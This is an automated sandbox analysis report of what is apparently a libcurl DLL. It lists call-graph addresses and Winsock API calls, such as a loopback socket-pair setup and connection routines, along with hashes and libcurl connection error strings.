6b8e4b14 27477->27467 27477->27476 27478->27473 27479 6b8e4c87 curl_url_get 27478->27479 27480 6b8e4cde 27479->27480 27481 6b8e4cb1 27479->27481 27480->27474 27483 6b8e4d04 curl_url_get 27480->27483 27595 6b8da3c0 47 API calls 27481->27595 27484 6b8e4d1c 27483->27484 27485 6b8e4d49 27483->27485 27596 6b8da3c0 47 API calls 
27484->27596 27485->27474 27487 6b8e4d6b curl_url_get 27485->27487 27488 6b8e4d83 27487->27488 27488->27474 27489 6b8e4db1 curl_url_get 27488->27489 27490 6b8e4dc9 27489->27490 27491 6b8e4de0 curl_url_get 27489->27491 27490->27474 27490->27491 27491->27474 27492 6b8e4dfc curl_url_get 27491->27492 27493 6b8e4e37 27492->27493 27494 6b8e4e14 27492->27494 27597 6b9289b6 47 API calls 27493->27597 27496 6b8e4e5e curl_url_get 27494->27496 27497 6b8e4e2b 27494->27497 27496->27474 27498 6b8e4e7c 27496->27498 27497->27368 27498->27474 27598 6b8e5400 75 API calls __dosmaperr 27498->27598 27501 6b8e3a68 27500->27501 27502 6b8e3ace 27500->27502 27503 6b8e3aa3 27501->27503 27600 6b8da3c0 47 API calls 27501->27600 27504 6b8e3b17 27502->27504 27511 6b8e3aff 27502->27511 27532 6b8e3b0a 27502->27532 27503->27502 27503->27532 27601 6b8da3c0 47 API calls 27503->27601 27505 6b8e3b4d 27504->27505 27512 6b8e3b37 27504->27512 27508 6b8e3b56 curl_getenv 27505->27508 27531 6b8e3b94 ___from_strstr_to_strchr 27505->27531 27509 6b8e3b6e curl_getenv 27508->27509 27510 6b8e3b86 27508->27510 27509->27510 27509->27531 27513 6b9006b0 74 API calls 27510->27513 27602 6b9005d0 74 API calls __fassign 27511->27602 27603 6b9005d0 74 API calls __fassign 27512->27603 27513->27531 27516 6b8e3d5b curl_getenv 27518 6b8e3dd0 27516->27518 27526 6b8e3d8f 27516->27526 27519 6b8e3e0e 27518->27519 27520 6b8e3dda curl_getenv 27518->27520 27523 6b9006b0 74 API calls 27519->27523 27520->27519 27522 6b8e3df4 curl_getenv 27520->27522 27521 6b8e3e1c 27529 6b8e3e86 27521->27529 27605 6b8e4770 85 API calls 27521->27605 27522->27519 27522->27521 27523->27521 27524 6b91db71 __fassign 5 API calls 27525 6b8e2f71 27524->27525 27525->27369 27525->27371 27525->27406 27526->27518 27530 6b8e3db9 curl_getenv 27526->27530 27529->27532 27606 6b8e4770 85 API calls 27529->27606 27530->27518 27531->27516 27531->27521 27604 6b9294c5 47 API calls 27531->27604 27532->27524 27534 6b8e41b1 27533->27534 27540 6b8e3000 27534->27540 27542 
6b8e4308 27534->27542 27607 6b8fa120 79 API calls 27534->27607 27535 6b8e43af 27539 6b8e43b3 curl_url_set 27535->27539 27535->27540 27536 6b8e431b curl_url_set 27536->27535 27536->27540 27538 6b8e42f0 27541 6b9006b0 74 API calls 27538->27541 27538->27542 27539->27540 27540->27361 27540->27406 27543 6b8e4590 27540->27543 27541->27542 27542->27535 27542->27536 27542->27540 27544 6b8e4750 27543->27544 27549 6b8e45a9 ___from_strstr_to_strchr 27543->27549 27544->27375 27545 6b8e45de curl_maprintf 27546 6b8e4759 27545->27546 27545->27549 27546->27375 27549->27544 27549->27545 27550 6b9006b0 74 API calls 27549->27550 27608 6b928962 47 API calls 27549->27608 27609 6b8e43e0 74 API calls ___from_strstr_to_strchr 27549->27609 27550->27549 27552 6b8e1e15 27551->27552 27554 6b8e1e2d 27551->27554 27553 6b9006b0 74 API calls 27552->27553 27552->27554 27553->27554 27554->27378 27554->27379 27554->27406 27556 6b8e1e60 27555->27556 27557 6b90e5d0 2 API calls 27556->27557 27558 6b8e1ec2 27556->27558 27557->27558 27558->27433 27560 6b8e5255 27559->27560 27561 6b8e37da 27560->27561 27562 6b8e5294 curl_maprintf 27560->27562 27561->27406 27563 6b8d3580 27561->27563 27562->27561 27564 6b8d35c1 27563->27564 27565 6b8d35f6 27564->27565 27566 6b8d35e1 27564->27566 27567 6b90e5d0 2 API calls 27565->27567 27570 6b8d3618 27565->27570 27568 6b91db71 __fassign 5 API calls 27566->27568 27567->27570 27569 6b8d35f2 27568->27569 27569->27437 27571 6b8d367e 27570->27571 27572 6b8d3668 27570->27572 27573 6b91db71 __fassign 5 API calls 27571->27573 27574 6b91db71 __fassign 5 API calls 27572->27574 27575 6b8d368f 27573->27575 27576 6b8d367a 27574->27576 27575->27437 27576->27437 27578 6b8e8752 27577->27578 27579 6b8e875a 27578->27579 27610 6b8e84a0 27578->27610 27579->27448 27581 6b8e8772 27581->27448 27582->27393 27583->27385 27584->27402 27585->27410 27586->27413 27587->27420 27588->27427 27589->27441 27590->27441 27592 6b8e5333 curl_url_cleanup 27591->27592 27592->27463 27594->27477 27595->27480 
27596->27485 27597->27494 27598->27474 27599->27474 27600->27503 27601->27502 27602->27532 27603->27532 27604->27531 27605->27529 27606->27532 27607->27538 27608->27549 27609->27549 27611 6b8e84e7 27610->27611 27640 6b8e8840 27611->27640 27613 6b8e84ff 27614 6b9006b0 74 API calls 27613->27614 27631 6b8e8515 27613->27631 27614->27631 27615 6b8e8589 inet_pton 27617 6b8e859a 27615->27617 27618 6b8e85b9 inet_pton 27615->27618 27616 6b91db71 __fassign 5 API calls 27619 6b8e8679 27616->27619 27656 6b8d6fb0 htons __fassign 27617->27656 27621 6b8e85ca 27618->27621 27626 6b8e85d9 27618->27626 27619->27581 27657 6b8d6fb0 htons __fassign 27621->27657 27622 6b8e85a9 27622->27618 27624 6b8e867d 27622->27624 27661 6b8e7ae0 78 API calls __fassign 27624->27661 27625 6b8e86cf 27627 6b91db71 __fassign 5 API calls 27625->27627 27626->27624 27626->27625 27633 6b8e8617 27626->27633 27658 6b8fdb40 145 API calls ___scrt_fastfail 27626->27658 27629 6b8e86df 27627->27629 27629->27581 27630 6b8e8656 27630->27616 27631->27615 27631->27625 27631->27630 27633->27624 27634 6b8e8630 27633->27634 27634->27630 27635 6b8e864a 27634->27635 27636 6b8e8643 27634->27636 27660 6b8d1380 90 API calls 27635->27660 27659 6b8fdcd0 112 API calls 2 library calls 27636->27659 27639 6b8e8648 27639->27625 27639->27630 27662 6b8e87e0 48 API calls 27640->27662 27642 6b8e8873 27643 6b8e8997 27642->27643 27649 6b8e88e0 27642->27649 27663 6b9294c5 47 API calls 27642->27663 27645 6b91db71 __fassign 5 API calls 27643->27645 27648 6b8e89a6 27645->27648 27647 6b8e88b8 curl_msnprintf 27647->27649 27648->27613 27649->27643 27649->27649 27664 6b926edc 26 API calls 27649->27664 27650 6b8e8922 27650->27643 27651 6b8e8966 27650->27651 27652 6b9006b0 74 API calls 27651->27652 27653 6b8e8971 27652->27653 27654 6b91db71 __fassign 5 API calls 27653->27654 27655 6b8e8993 27654->27655 27655->27613 27656->27622 27657->27626 27658->27633 27659->27639 27660->27639 27661->27630 27662->27642 27663->27647 27664->27650 27941 6b8eb930 116 
API calls ___from_strstr_to_strchr 27944 6b904050 115 API calls 27945 6b92dc55 28 API calls ___scrt_uninitialize_crt 27946 6b8da740 curl_easy_unescape 27947 6b8dc540 107 API calls 27948 6b8ef140 112 API calls 27949 6b8ea740 76 API calls 26649 6b91e65e 26650 6b91e66a ___scrt_is_nonwritable_in_current_image 26649->26650 26651 6b91e693 dllmain_raw 26650->26651 26656 6b91e68e 26650->26656 26657 6b91e679 26650->26657 26652 6b91e6ad dllmain_crt_dispatch 26651->26652 26651->26657 26652->26656 26652->26657 26653 6b91e6fa 26654 6b91e703 dllmain_crt_dispatch 26653->26654 26653->26657 26655 6b91e716 dllmain_raw 26654->26655 26654->26657 26655->26657 26656->26653 26658 6b91e6e6 dllmain_crt_dispatch dllmain_raw 26656->26658 26658->26653 27950 6b910a40 52 API calls __fassign 27039 6b8d1050 27040 6b8d107b 27039->27040 27043 6b8d108f 27039->27043 27042 6b8e8a20 2 API calls 27040->27042 27041 6b90e5d0 2 API calls 27046 6b8d10c6 ___scrt_fastfail 27041->27046 27042->27043 27043->27041 27044 6b8d118c 27086 6b921f49 14 API calls __dosmaperr 27044->27086 27046->27044 27050 6b8d1158 InitializeCriticalSectionEx 27046->27050 27051 6b8d1179 27046->27051 27047 6b8d11a7 27087 6b9005d0 74 API calls __fassign 27047->27087 27049 6b8d11b9 27062 6b906d50 socket 27050->27062 27085 6b8d1670 DeleteCriticalSection closesocket ___scrt_fastfail 27051->27085 27054 6b8d1172 27054->27051 27055 6b8d11df 27054->27055 27056 6b8d122d 27055->27056 27082 6b8d9120 27055->27082 27089 6b8d15c0 8 API calls 27056->27089 27060 6b8d1240 27063 6b906f21 27062->27063 27064 6b906d8d htonl setsockopt 27062->27064 27065 6b91db71 __fassign 5 API calls 27063->27065 27066 6b906ddc bind 27064->27066 27067 6b906f0f closesocket closesocket closesocket 27064->27067 27068 6b906f31 27065->27068 27066->27067 27069 6b906df2 getsockname 27066->27069 27067->27063 27068->27054 27069->27067 27070 6b906e0a listen 27069->27070 27070->27067 27071 6b906e1c socket 27070->27071 27071->27067 27072 6b906e2f connect 27071->27072 27072->27067 27073 
6b906e45 accept 27072->27073 27073->27067 27074 6b906e5c curl_msnprintf 27073->27074 27075 6b906e76 27074->27075 27075->27075 27076 6b906e7d send 27075->27076 27076->27067 27077 6b906e92 recv 27076->27077 27077->27067 27081 6b906ea7 27077->27081 27078 6b906ef5 closesocket 27079 6b91db71 __fassign 5 API calls 27078->27079 27080 6b906f0b 27079->27080 27080->27054 27081->27067 27081->27078 27090 6b928360 27082->27090 27084 6b8d1218 27084->27060 27088 6b921f49 14 API calls __dosmaperr 27084->27088 27085->27044 27086->27047 27087->27049 27088->27056 27089->27044 27091 6b928381 27090->27091 27092 6b92836d 27090->27092 27105 6b928310 27091->27105 27114 6b921f49 14 API calls __dosmaperr 27092->27114 27096 6b928372 27115 6b92f18d 25 API calls __fassign 27096->27115 27098 6b928396 CreateThread 27100 6b9283c1 27098->27100 27101 6b9283b5 GetLastError 27098->27101 27099 6b92837d 27099->27084 27117 6b928282 27100->27117 27116 6b921f13 14 API calls __dosmaperr 27101->27116 27106 6b92f78d __dosmaperr 14 API calls 27105->27106 27107 6b928321 27106->27107 27108 6b92f7ea _free 14 API calls 27107->27108 27109 6b92832e 27108->27109 27110 6b928352 27109->27110 27111 6b928335 GetModuleHandleExW 27109->27111 27112 6b928282 16 API calls 27110->27112 27111->27110 27113 6b92835a 27112->27113 27113->27098 27113->27100 27114->27096 27115->27099 27116->27100 27118 6b92828e 27117->27118 27124 6b9282b2 27117->27124 27119 6b928294 CloseHandle 27118->27119 27120 6b92829d 27118->27120 27119->27120 27121 6b9282a3 FreeLibrary 27120->27121 27122 6b9282ac 27120->27122 27121->27122 27123 6b92f7ea _free 14 API calls 27122->27123 27123->27124 27124->27084 27952 6b8da150 FreeLibrary FreeLibrary WSACleanup 27954 6b8d4850 74 API calls 27955 6b8dac50 30 API calls 27957 6b912170 6 API calls __fassign 27958 6b8d1260 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27963 6b8f2160 CryptAcquireContextA CryptCreateHash 27964 6b8f3760 51 API calls 2 library calls 27965 6b904160 108 API calls 27125 6b8d9870 
27126 6b8d9879 27125->27126 27127 6b8d9882 27125->27127 27128 6b8e1650 106 API calls 27126->27128 27128->27127 27966 6b8d7f70 7 API calls 27967 6b8dbc70 96 API calls 2 library calls 27665 6b91e46f 27666 6b91e47a 27665->27666 27667 6b91e4ad dllmain_crt_process_detach 27665->27667 27668 6b91e49f dllmain_crt_process_attach 27666->27668 27669 6b91e47f 27666->27669 27673 6b91e489 27667->27673 27668->27673 27670 6b91e495 27669->27670 27672 6b91e484 27669->27672 27680 6b91e934 23 API calls 27670->27680 27672->27673 27675 6b91e953 27672->27675 27681 6b92cd9f 27675->27681 27679 6b91e95d 27679->27673 27680->27673 27685 6b92f50f 27681->27685 27684 6b92032a 21 API calls __freeptd 27684->27679 27686 6b92f519 27685->27686 27689 6b91e958 27685->27689 27693 6b92fb50 6 API calls __dosmaperr 27686->27693 27688 6b92f520 27688->27689 27690 6b92fb8f __dosmaperr 6 API calls 27688->27690 27689->27684 27691 6b92f533 27690->27691 27694 6b92f3d6 27691->27694 27693->27688 27695 6b92f3e1 27694->27695 27699 6b92f3f1 27694->27699 27700 6b92f3f7 27695->27700 27698 6b92f7ea _free 14 API calls 27698->27699 27699->27689 27701 6b92f412 27700->27701 27702 6b92f40c 27700->27702 27704 6b92f7ea _free 14 API calls 27701->27704 27703 6b92f7ea _free 14 API calls 27702->27703 27703->27701 27705 6b92f41e 27704->27705 27706 6b92f7ea _free 14 API calls 27705->27706 27707 6b92f429 27706->27707 27708 6b92f7ea _free 14 API calls 27707->27708 27709 6b92f434 27708->27709 27710 6b92f7ea _free 14 API calls 27709->27710 27711 6b92f43f 27710->27711 27712 6b92f7ea _free 14 API calls 27711->27712 27713 6b92f44a 27712->27713 27714 6b92f7ea _free 14 API calls 27713->27714 27715 6b92f455 27714->27715 27716 6b92f7ea _free 14 API calls 27715->27716 27717 6b92f460 27716->27717 27718 6b92f7ea _free 14 API calls 27717->27718 27719 6b92f46b 27718->27719 27720 6b92f7ea _free 14 API calls 27719->27720 27721 6b92f479 27720->27721 27726 6b92f223 27721->27726 27727 6b92f22f ___scrt_is_nonwritable_in_current_image 27726->27727 27742 
6b932dc8 EnterCriticalSection 27727->27742 27730 6b92f239 27732 6b92f7ea _free 14 API calls 27730->27732 27733 6b92f263 27730->27733 27732->27733 27743 6b92f282 27733->27743 27734 6b92f28e 27735 6b92f29a ___scrt_is_nonwritable_in_current_image 27734->27735 27747 6b932dc8 EnterCriticalSection 27735->27747 27737 6b92f2a4 27748 6b92f4c4 27737->27748 27739 6b92f2b7 27752 6b92f2d7 27739->27752 27742->27730 27746 6b932e10 LeaveCriticalSection 27743->27746 27745 6b92f270 27745->27734 27746->27745 27747->27737 27749 6b92f4d3 __fassign 27748->27749 27751 6b92f4fa __fassign 27748->27751 27749->27751 27755 6b935193 14 API calls 2 library calls 27749->27755 27751->27739 27756 6b932e10 LeaveCriticalSection 27752->27756 27754 6b92f2c5 27754->27698 27755->27751 27756->27754 27839 6b8f7d70 27840 6b90e5d0 2 API calls 27839->27840 27842 6b8f7d97 27840->27842 27841 6b8f7e5c 27843 6b91db71 __fassign 5 API calls 27841->27843 27842->27841 27844 6b8f7db5 27842->27844 27845 6b8f7e6e 27843->27845 27846 6b8f7dbd 27844->27846 27847 6b8f7dd1 27844->27847 27848 6b91db71 __fassign 5 API calls 27846->27848 27852 6b8f7df1 27847->27852 27859 6b8f88f0 27847->27859 27851 6b8f7dcd 27848->27851 27853 6b8f7e34 27852->27853 27870 6b909490 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27852->27870 27871 6b8f7680 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27852->27871 27855 6b8f7e46 27853->27855 27872 6b8f7580 7 API calls 27853->27872 27857 6b91db71 __fassign 5 API calls 27855->27857 27858 6b8f7e58 27857->27858 27860 6b8f9a08 27859->27860 27867 6b8f8912 27859->27867 27860->27847 27861 6b8d3580 7 API calls 27861->27867 27862 6b8f69d0 76 API calls 27862->27867 27864 6b8f991d curl_pushheader_bynum 27864->27867 27865 6b9005d0 74 API calls 27865->27867 27867->27860 27867->27861 27867->27862 27867->27864 27867->27865 27868 6b8e1bd0 83 API calls 27867->27868 27869 6b8f83d0 
138 API calls 27867->27869 27873 6b8f6cb0 74 API calls 27867->27873 27874 6b8fcd80 93 API calls 27867->27874 27868->27867 27869->27867 27870->27852 27871->27852 27872->27855 27873->27867 27874->27867 27968 6b8f7c70 110 API calls

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 134 6b906d50-6b906d87 socket 135 6b906f21-6b906f34 call 6b91db71 134->135 136 6b906d8d-6b906dd6 htonl setsockopt 134->136 138 6b906ddc-6b906dec bind 136->138 139 6b906f0f-6b906f1f closesocket * 3 136->139 138->139 141 6b906df2-6b906e04 getsockname 138->141 139->135 141->139 142 6b906e0a-6b906e16 listen 141->142 142->139 143 6b906e1c-6b906e29 socket 142->143 143->139 144 6b906e2f-6b906e3f connect 143->144 144->139 145 6b906e45-6b906e56 accept 144->145 145->139 146 6b906e5c-6b906e73 curl_msnprintf 145->146 147 6b906e76-6b906e7b 146->147 147->147 148 6b906e7d-6b906e90 send 147->148 148->139 149 6b906e92-6b906ea5 recv 148->149 149->139 150 6b906ea7-6b906eb0 149->150 151 6b906eb2-6b906eb6 150->151 152 6b906ec3-6b906ec6 150->152 153 6b906ec8-6b906ecc 151->153 154 6b906eb8-6b906ec1 151->154 152->153 155 6b906ef5-6b906f0e closesocket call 6b91db71 152->155 153->139 156 6b906ece-6b906ed1 153->156 154->151 154->152 156->155 158 6b906ed3-6b906ed9 156->158 158->139 160 6b906edb-6b906ede 158->160 160->155 161 6b906ee0-6b906ee6 160->161 161->139 162 6b906ee8-6b906eeb 161->162 162->155 163 6b906eed-6b906ef3 162->163 163->139 163->155
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 6B906D80
                                                                                                                                  • htonl.WS2_32(7F000001), ref: 6B906DA3
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B906DCD
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 6B906DE3
                                                                                                                                  • getsockname.WS2_32(00000000,?,00000010), ref: 6B906DFB
                                                                                                                                  • listen.WS2_32(00000000,00000001), ref: 6B906E0D
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 6B906E22
                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 6B906E36
                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 6B906E4A
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000C,6B940CA0,6B8D1172), ref: 6B906E68
                                                                                                                                  • send.WS2_32(6B8D1172,?,?,00000000), ref: 6B906E88
                                                                                                                                  • recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B906E9D
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 6B906EF6
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 6B906F16
                                                                                                                                  • closesocket.WS2_32(6B8D1172), ref: 6B906F1A
                                                                                                                                  • closesocket.WS2_32(C74C79C0), ref: 6B906F1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4135244658-0
                                                                                                                                  • Opcode ID: e3847561f87b6e087068377100dd8c6ddeade52681c0ea59069f12b504c7311f
                                                                                                                                  • Instruction ID: 0d3396fbe07ac2ce3c8038bb8e824da9f85bd99b668d525327a635305353a943
                                                                                                                                  • Opcode Fuzzy Hash: e3847561f87b6e087068377100dd8c6ddeade52681c0ea59069f12b504c7311f
                                                                                                                                  • Instruction Fuzzy Hash: 0B51D731904118ABDB209F78CC85BBD7B79AF16334F2043A9E975AA1D0DB75D886CB60

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • WSASetLastError.WS2_32(00002726), ref: 6B8FFF52
                                                                                                                                  • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B900105
                                                                                                                                  • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B90012E
                                                                                                                                  • Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B900157
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B9001AA
                                                                                                                                  • select.WS2_32(?,?,?,?,?), ref: 6B900271
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B9002A9
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B9002E9
                                                                                                                                  • __WSAFDIsSet.WS2_32(?,?), ref: 6B900306
                                                                                                                                  • Sleep.KERNEL32(FFFFFFFE), ref: 6B90037E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1691268743-0
                                                                                                                                  • Opcode ID: a88f4f09adbb2f6151ba90d52ef15916c0021b563470ad1963238f1782358965
                                                                                                                                  • Instruction ID: 5c926475dc604d6beb03cb11f3f75c3f794dd9a7604ecc6e00d35d12fbb0aec3
                                                                                                                                  • Opcode Fuzzy Hash: a88f4f09adbb2f6151ba90d52ef15916c0021b563470ad1963238f1782358965
                                                                                                                                  • Instruction Fuzzy Hash: 06D1A570A0421D8BEB65CF29C8507AA73B9EF59714F1086EDE869D7290DF78CA80CB44

                                                                                                                                  Control-flow Graph

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2fcd29f128afd7dc6208c5102b42c3602cd0db76daccd7810685d76146b3a20f
                                                                                                                                  • Instruction ID: e5f7349f2cb89baaac90f76a089c742f17ae9e3f41e03f2bfa90a4bba6443abc
                                                                                                                                  • Opcode Fuzzy Hash: 2fcd29f128afd7dc6208c5102b42c3602cd0db76daccd7810685d76146b3a20f
                                                                                                                                  • Instruction Fuzzy Hash: 15027E79E002199FEF10CFA8C881BAEB7B9FF58350F504569E955EB291E739D802CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  • Connection time-out, xrefs: 6B8D32C4
                                                                                                                                  • After %I64dms connect time, move on!, xrefs: 6B8D2F3C
                                                                                                                                  • Failed to connect to %s port %ld: %s, xrefs: 6B8D327D
                                                                                                                                  • connect to %s port %ld failed: %s, xrefs: 6B8D3070
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                  • API String ID: 0-184998888
                                                                                                                                  • Opcode ID: ada8208aff8a28491fd0e22a1728219d784a3a8e640fe1a5a388004d92907d0c
                                                                                                                                  • Instruction ID: 144e462b26fe86d34814f334647b24520a338b3e0a008a7c812270024a439969
                                                                                                                                  • Opcode Fuzzy Hash: ada8208aff8a28491fd0e22a1728219d784a3a8e640fe1a5a388004d92907d0c
                                                                                                                                  • Instruction Fuzzy Hash: D9F1D270E006189BDB219F38DC41BEAB3B5EF85319F0049DEE95DA7251DB39AE84CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • recv.WS2_32(?,?,?,00000000), ref: 6B900B04
                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 6B900B2B
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B900B3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastrecvsend
                                                                                                                                  • String ID: Send failure: %s
                                                                                                                                  • API String ID: 3418755260-857917747
                                                                                                                                  • Opcode ID: 31e20452ddee766bd9d2968f0331ee43b1236cf68786baa121f47136b52c216a
                                                                                                                                  • Instruction ID: f0d24365b228dca41d212296940e7ac136390348647f567bd7f03f8db2001806
                                                                                                                                  • Opcode Fuzzy Hash: 31e20452ddee766bd9d2968f0331ee43b1236cf68786baa121f47136b52c216a
                                                                                                                                  • Instruction Fuzzy Hash: E251AD71A0421D9FDF24CF28CC41BA9B7F9AF15328F0042ADE969D7290CB74E991CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(?,?,?), ref: 6B8D41C1
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B8D42C8
                                                                                                                                  • WSAGetLastError.WS2_32(?,00000100), ref: 6B8D42DE
                                                                                                                                  • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B8D4377
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B8D43A3
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B8D43DE
                                                                                                                                  • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B8D4461
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B8D446B
                                                                                                                                    • Part of subcall function 6B8FA660: ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                    • Part of subcall function 6B90E5D0: QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                    • Part of subcall function 6B90E5D0: __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                    • Part of subcall function 6B90E5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • connect.WS2_32(00000000,?,?), ref: 6B8D45D2
                                                                                                                                    • Part of subcall function 6B8F69D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8F6A0D
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D4604
                                                                                                                                  Strings
                                                                                                                                  • Trying %s:%ld..., xrefs: 6B8D4271
                                                                                                                                  • @, xrefs: 6B8D430C
